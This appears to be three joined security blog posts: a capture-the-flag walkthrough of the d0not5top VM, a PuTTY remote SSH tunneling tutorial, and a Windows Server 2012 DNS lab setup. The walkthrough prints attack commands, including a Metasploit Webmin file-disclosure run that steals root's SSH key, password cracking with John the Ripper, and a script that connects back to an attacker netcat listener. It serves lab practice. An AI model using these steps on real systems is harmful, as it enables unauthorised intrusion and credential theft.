Hack the d0not5top VM (CTF Challenge)

This time we are going to solve a fun Vulnerable Lab d0not5top 1.2. To do so we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to 3mrgnc3 who has hidden 7 flags inside this lab as a challenge for hackers.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.113 but you will have to find your own)

netdiscover

Next we run nmap

nmap -sV 192.168.1.113

Now, visit the IP in the Browser.

Since we  didn’t found something interesting when explore its IP in browser therefore now I am going to scan the Web Content by using dirb in kali linux.

dirb http://192.168.1.113

As you can observe from above image I had highlighted a URL which indicates toward the control panel of website lets open 192.168.1.113/control in the Browser. Yes it is DNS control panel but I didn’t found any clue for 1^st flag on this web page.

After that move towards its view source page and notice FL46_1 which indicate it is the 1^st flag.

Wonderful!! Successfully found 1^st flag

From the scanning result of dirb we found so many web directories in this machine therefore further I choose 192.168.1.113/control/js Directory. In this I found a File README.MadBro. It will open as shown below.

Now here we found a Binary code which is to be converted into Decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.

Now, for third flag, we will use netcat very verbrose mode on port 25 which hosts smtpd service (This can be found by doing an aggressive nmap scan on the IP)

nc –vv 192.168.1.113 25

Here we found a Hexadecimal code which is to be converted in Text. 

Great!! Successfully get 3nd Flag also.

On the url on which we found Second Flag, There is an instruction written in Leet, It reads : M4K3 5UR3 2 S3TUP YOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hosts and add an entry as shown in given image.

Now open donot5topme.ctf in the browser as shown and Click on Register given at the end of web page.

As you can observe that we didn’t found any clue on this web page therefore open view source page.

At View Page Source, here we found this link as shown in highlighted text.

Some kind of encoded web page is open then I search in google related to this encoding. It is known as brain fuck encoding.

So we will decrypt it. Here we got the FL46_4

Successfully found 4^th flag

Now move back to the d0not5topme.ctf. Now we will click on Register and Then on I agree to these terms and we will get to Registration Page. Here we click on Board Administration, which opens a prompt which asks for the client to open mailto link, here I choose Gmail.

Here I found another domain name “Megusta@G4M35.ctf”

Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.

Before, I  open this domain in browser, Here I got a game to play, although you can get the next clue by playing too, but I  thought of a more technical approach and open this webpage and with Inspect Element. Now select the Debugger Tab. Here I found game.js and inside the Game_Over script I found the next clue as “/H3X6L4m3”

Now opened the complete link “g4m35.ctf/H3X6L4m3” , it gave another new game.

Again we can play and discover the next clue/flag. But we went to get a bit technical approach and ran a dirb command to look after its directories.

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

Now I had open this Texture directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.

Now open this image and get the octal code.

When decode this code I found FL46_5

I had Captured 5th flag also!!

Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another ctf “t3rmln4l.ctf” as shown below.

Now let’s add t3rmln4l.ctf into /etc/hosts as we did before and click on Save

Now as before, when opening this domain in browser, I got a Terminal which asks for password. After trying a bunch of commands, I found grep* runs on this terminal and for authentication I entered the name of ctf as password i.et3rm1a4l.ctf and found another ctf “M36u574.ctf”.

Now let’s add M36u574.ctf also into /etc/hosts as we did before and click on Save.

Now as before, you will open this domain in browser, you will get a slideshow of Megusta images. Out of different images I have download the kingmegusta.jpg.

Now we will run exiftool on this image, here I got some code in Comment as shown below.

Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.

Then I had created a text file on /root/Desktop name anything you want and Paste the above decoded text in this file.

Now run John The Ripper, using this file as shown

john --wordlist=/usr/share/wordlists/rockyou.txt donotstop

Here I found a user MeGustaKing and Password ********** (10 times *).

Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.

Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.

Great! It is the 6th Flag.

As mentioned above in the previous ssh login we got this username burtieo and its password is the text written above it i.e. Lets you update your FunNotes and more!

Now let’s login in ssh using combination

Username : burtieo and Password : Lets you update your FunNotes and more!

This opens rbash shell and rbash shell restricts some of the features of bash shell.

So, firstly run following command

suedoh –l

And then we run the command

suedoh /usr/bin/wmstrt

Using nmap command I found up the port 10000 open.

But this port only remains open for 20 seconds, we can make it stay open for long using “for loop” as shown.

Now let’s run metasploit and use the exploit named file_disclosure

msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost 192.168.1.113

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit

I found the RSA Private Key as shown.

Now Copy and Paste this Private Key in a file and name it id_rsa and then Run John The Ripper.

ssh2john id_rsa> ignite

john --wordlist:/usr/share/wordlists/rockyou.txt ignite

This has given the root password .i.e. “gustateamo”

Now I have removed permissions from id_rsa by chmod 700 and login into ssh as root with password gustateamo as shown below.

Now type following command

ls

You can observe from given image it consist two file let open one of them

cat L45T_fl46.pl

Here it gave the message to use L45T_fl46.pl

Now use netcat command to establish connection with target through port 1234.

nc –lp 1234 –vv

Now in D0Not5top terminal we will open file L45T_fl46.pl with IP 192.168.0.7 (Kali Linux IP) as given below:

./ L45T_fl46.pl 192.168.0.7 1234

On attacker system it will you will found get netcat connect with targeted system. The highlighted text is indicating toward FL46_7

Congratulations!! It is the 7th Flag.

Solving this lab was a fun and learning experience.

How to Perform Remote Tunneling

Hello friends! Previously we had discussed on Dynamic tunneling and Local tunneling and today we are going to discuss Remote tunneling.

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

Example: Your personal laptop (at home) is connected with your office server; currently you are working on a client system (at office) which is connected to office server. Now if you want to connect your client system with laptop in order to read some document then there should be a remote tunnel between them for communication.

Let’s Begin!!

Objective:  To establish HTTP connection between remote PC and client server of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface) 

IP 192.168.0.116 connected to remote system 192.168.0.100

IP 192.168.10.1 connected to local network system 192.168.10.2

Ubuntu client (local network system) holds IP 192.168.10.2

Remote system (outside network) holds IP 192.168.0.100

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.0.116 and another 192.168.10.1 as explain above.

Another image given below is describing network configuration for ubuntu client which is showing IP 192.168.10.2

Another image given below is describing network configuration for Remote Desktop whose IP is 192.168.0.100

Since in this tutorial we are showing HTTP tunneling and this service is running on port 80 of Xampp server (at localhost).

From given image you can observe that the wordpress website is running on port 80.

At SSH server we have successfully browse wordpress website using URL http://192.168.0.100/index.html and get connected with remote desktop, since they belongs to same network hence they both can access each other network for communication.

Similarly we had tried connect remote Desktop with ubuntu client through URL http://192.168.0.100/index.html but get failed to browse wordpress website. Since they both belong to different network hence connection forbidden here.

Now try to establish link between remote desktop and ubuntu client using putty.

Use putty to connect SSH server (192.168.0.116) via port 22 and follow given below steps.

Then go with option SSH >Tunnel specified in the left column of category and follow given below steps:

1.       Mark the check box for “Local ports accept connections from other hosts”

2.       Give new port forwarded as 7000 and connection type as remote.

3.       Destination address as 127.0.0.1:80 for establishing connection and then click on ADD at last

4.       Click on open when all things are set.

Note: If SSH service is activated at remote desktop then replaces port 80 with port 22 which will create Remote SSH tunneling.

This will first establish the connection between remote pc and SSH server which will act like a link between remote desktop and ubuntu client throughout communication.

Now open the browser inside ubuntu client and again try to connect with remote desktop using URL http://192.168.0.116:7000/index.html this will browse wordpress website which was running on localhost of remote desktop via SSH server on port 7000.

Hence we had successfully connected with remote desktop through ubuntu client.

Setup DNS Penetration testing Lab in Windows Server 2012

Domain Name System is used for name translation into IP address or you can say that it is used for name resolution.

This name is only for the benefit of the human. It is translated into IP addresses to reach the destination. The translation process of a name is called name resolution.

Name resolution starts from right to left. There is another "." after com but it is hidden. This is called root level domain. Winner request is sent to the root domain for translation it forwards this request to com domain which is called Top Level Domain. Com passes the request to yahoo domain which is called 2^ndlevel domain .Yahoo then sends the request to www which is called host name.

Structure of the DNS is distributed over the internet. It means that the name resolution task is not assigned to only computer rather it is distributed over the internet.

Steps to Install DNS server

Configure Static IP setting of your server; here we had assigned 192.168.1.104 IP to our machine moreover we had assign server IP also as preferred DNS server.

We have to open Server Manager and then click on Add Roles and Features in order to install role services and features. A new window will come up on screen. Now click on next as shown below in given image.

Select installation type “role based or feature based installation” which is also select as default option and then click on next for further step.

Select the desire server from server pool for configuration of DNS server. From given below image you can observe that  from inside pool 1 computer is found with IP 192.168.1.104 that has been selected as server, now click on next.

Select DNS server checkbox as role to install it on selected server and click on Next.

Now Just Click on Next after reading brief description of DNS.

To install selected role and feature on selected server click on install.

DNS server installation process begins which may takes few minute for installation, at last click on close once the installation has been completed.

This is all about DNS installation now in next step we will configure DNS server.

Zone

Database of DNS is called zone or partition of Domain Name Space represented by Domain Name is called Zone. When you click on zone then you will see two zones one is Forward Lookup Zone and Reverse Lookup Zone.

Forward Lookup Zone sends name and get IP address of the computer.

While Reverse Lookup Zone sends IP address of the computer then why we need name of the computer. The answer is that if firewall is installed on the computer then firewall stop or allow traffic on the basis of name that is why reverse lookup zone is used to convert IP address in the name.

Steps to create a Forward Lookup zone:

1)      Select DNS from drop down list server manger, this will open the server on which we have install DNS role.  Select your server (WIN-KSR8OM147HH ) make right click on it  and select DNS from that list.

When we select DNS in server Manager it will open a new window as DNS Manager.

Now we will configure Forward lookup zone as well as Reverse Lookup Zone. So to create Forward Lookup Zone, select Forward Lookup Zones and right click on it and select New Zone from menu box to take up the New Zone Wizard then click on next.

It will show the list of Different types of Zones and storage such as Primary Zone, Secondary Zone & Stub Zone.

Zone Types

Primary Zone:  A primary DNS zone has authority of read / writes for DNS server also known as master server. It stores the master copy of zone data in a local file or in AD DS. 

Secondary Zone:  A Secondary DNS Zone is Read-Only copy of a Primary Zone; this DNS server is a secondary resource for information about this zone.

Active Directory Integrated DNS Zone: It is also writeable zone. To make Active Directory Integrated zone the machine must be a domain Controller. RODC (read only domain controller).feature is only available in server 2008 R2.The domain controller must be writeable not read only because it is more secure. There is a security tab in the AD integrated zone, it is a multi master structured. In case of AD integrated zone, DNS database will be replicated as a part of domain replication.

Stub zone: It is nature secondary. It has no database of its own. Its load the database from master DNS. It only takes selective records not the complete database. Three records NS, SOA and Glue A will transfer into stub zone. Stub is read only.

DNS uses port 53 for communication and it uses both TCP and UDP protocols. Dynamic DNS (DDNS) is used to automatically update IP addresses in DNS when changed by DHCP. You will enable DDNS option in the zone properties to secure only.

Select primary zone and click on next.

Give desired Zone name like raj and click on next.

Save this into a new zone file as raj.dns and click on next.

Select Do not allow dynamic updates option, if you want to update these records manually .Click on next then Finish.

Now we had completed the configuration for Forward Lookup Zone; next we will configure reverse lookup zone.

Reverse Lookup Zone:

Domain Name system (DNS) servers can enable clients to determine the DNS name of a host based on the host's IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to the host name. Some applications, such as secure web applications, rely on reverse lookups.

A reverse lookup takes the form of a question, such as "can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?"

A special domain, the in-addr.arpa  domain, was defined in the DNS standards and reserved in the internet DNS namespace to provide a practical and reliable way to perform reverse queries . In reverse lookup zone the address is written in reverse order.

Step to create a Reverse Lookup Zone:

To create Reverse Lookup Zone, make right click on it and click on New Zone from the inside the menu box to take up the New Zone Wizard.

Select primary zone and click on next.

Click on first radio button for IPv4 reverse Lookup Zone to translate IP address into DNS name then click on next.

Type Network ID field as 192.168.1 which is the first three octets of IP-address of our DNS Server then click on next.

Save this in a new zone file and select first radio button for this step then click on next.

Select Do not allow dynamic updates option, if you want to update these record manually. Click on next.

We have successfully completed configuration for new zone of reverse Lookup. Now just click on finish.

Now you can observe that on the right side of DNS Manager Window, Reverse Lookup Zone is now created that contains two records i.e. SOA and NS in it.

1)      Now we are going to create a new pointer in our new zone file i.e. 1.168.192.in-addr.arpa, as shown in given below image

Here we require host name in order to create new resource record, click on browse to select the record.

Resource Records

Resource records are the DNS database entries to answer DNS client queries. Name, type and data. The client query is always shown under the name title; DNS server answer always shown under the data title, in type different types of records is shown. Common recorded in DNS are A (Name to IP), PTR (reverse of A), SRV, MX, MS, SOA, etc.

Select 2^ndfile i.e. name server (NS) record as shown in given below image and click on OK.

DNS Queries

There are two types of queries in DNS:

·         Recursive Query: - It goes from DNS client to DNS server. It answer is complete means processing is complete.

·         Iterative Query: - It goes from DNS server to DNS server. It answer is not complete means its reply is referral. Iterative query is used to reach from one DNS to another DNS. It keeps the reply for 60minutes in his cache.

Verify DNS configuration

Open command prompt and type following command which will search for the Domain Name System (DNS) to find domain name or IP address mapping.

Nslookup 192.168.1.104 (server’s ip)

From given below image you can read the name of NS record/domain name i.e. raj.

Similarly using command nslookup raj we found host IP i.e. 192.168.1.104